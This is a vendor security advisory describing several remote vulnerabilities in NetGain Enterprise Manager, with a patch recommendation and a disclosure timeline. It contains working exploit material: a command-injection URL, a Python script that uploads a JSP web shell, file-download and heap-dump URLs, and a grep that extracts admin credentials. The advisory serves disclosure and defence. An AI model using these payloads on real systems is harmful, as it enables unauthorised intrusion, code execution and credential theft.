Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] NetGain Enterprise Manager Multiple Remote Vulnerabilities

High

Synopsis

While researching a command injection vulnerability published on Exploit Database, Tenable found multiple remote vulnerabilities in NetGain Enterprise Manager.

CVE-2017-16608: Incomplete Command Injection Patch

NetGain tried to patch the Exploit-DB command injection vulnerability in 7.2.586 build 877. The patch prevented the command injection by adding the following logic:

  1. The argument parameter must be a valid IP address
  2. The command must start with “cmd /c ping” or "ping –c 5"

The obvious problem is that an attacker can append additional information after the required command text. For instance, an attacker could make a new directory by using the command argument "cmd /c ping || mkdir C:\Users\Public\fun ||". The following URL is a complete example:

http://[target]:8081/u/jsp/tools/exec.jsp?command=cmd%20%2Fc%20ping%20%7C%7C%20mkdir%20C%3A%5CUsers%5CPublic%5Cfun%20%7C%7C&argument=127.0.0.1&async_output=nessus_56043399

CVE-2017-16610: Unauthenticated JSP Upload and Execution

An unauthenticated remote attacker can upload arbitrary files to the remote server via an HTTP POST request to /u/jsp/backup/upload_save_do.jsp. This is particularly useful because NetGain EM has write access to the web root. Which means that an attacker can upload a JSP web shell. The following proof of concept uploads a web shell to the Javascript directory.

import requests
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder

if len(sys.argv) != 3:
    print 'Usage: ./nsg_backup_upload.py <server_address> <port>'
    print 'Example: python ./nsg_backup_upload.py 192.168.1.38 8081'
    sys.exit(0);

jsp_shell = (
    '<%@ page import=\"java.util.*,java.io.*\"%>\n'
    '<html><body>'
    '<form method=\"GET\" name=\"myform\" action=\"\">\n'
        '<input type=\"text\" name=\"cmd\">\n'
        '<input type=\"submit\" value=\"Send\">\n'
    '</form>\n'
    '<pre>\n'
    '<%\n'
        'if (request.getParameter(\"cmd\") != null) {\n'
            'out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<br>\");\n'
            'Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n'
            'OutputStream os = p.getOutputStream();\n'
            'InputStream in = p.getInputStream();\n'
            'DataInputStream dis = new DataInputStream(in);\n'
            'String disr = dis.readLine();\n'
            'while ( disr != null ) {\n'
                'out.println(disr);\n'
                'disr = dis.readLine();\n'
            '}\n'
        '}\n'
     '%>\n'
    '</pre></body></html>')


multipart_data = MultipartEncoder(
    fields =
    {
        'file': ('../u/js/shell.jsp', jsp_shell, 'text/plain')
    })

response = requests.post('http://' + sys.argv[1] + ':' + sys.argv[2] + '/u/jsp/backup/upload_save_do.jsp',
    data=multipart_data, headers={'Content-Type': multipart_data.content_type})

CVE-2017-16609: Unauthenticated File Download

An unauthenticated remote attacker can download any file on the remote server via an HTTP GET (or POST) request. The following URL will download C:\Windows\win.ini:

http://[target]:8081/u/jsp/common/download.jsp?filename=win.ini&srcDir=C:\Windows

CVE-2017-16607: Unauthenticated Information Disclosure

NetGain EM allows an unauthenticated remote attacker to download all of the process's heap memory using the following URL:

http://[target]:8081/u/jsp/settings/heapdumps.jsp?dumpnow=1

The attacker can then search the memory for interesting information such as credentials. For example, Tenable found the admin username and password in a dump using the following method:

[email protected]:~$ strings ./heapdump_2017_03_07_15_48_34.bin | grep username=
username=admin&password=thisismypassword%21

CVE-2017-17406: Unsafe Java Object Deserialization

NetGain EM exposes a couple of Java RMI Registries on ports 1800 and 1850. Also, NetGain uses a few Java libraries that are known to be useful in Java deserialization attacks including bsh, Apache Commons Collections, and Apache Commons FileUpload. Tenable confirmed an unauthenticated remote attacker could achieve remote code execution using a deserialization attack over RMI.

Solution

Upgrade to NetGain Enterprise Manager 7.2.766 or later.

Disclosure Timeline

2017-03-08 - Issues discovered
2017-03-17 - Issues submitted to ZDI
2017-04-11 - ZDI accepts vulnerabilities
2017-12-13 - ZDI releases advisories
2018-01-30 - Tenable releases advisory

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]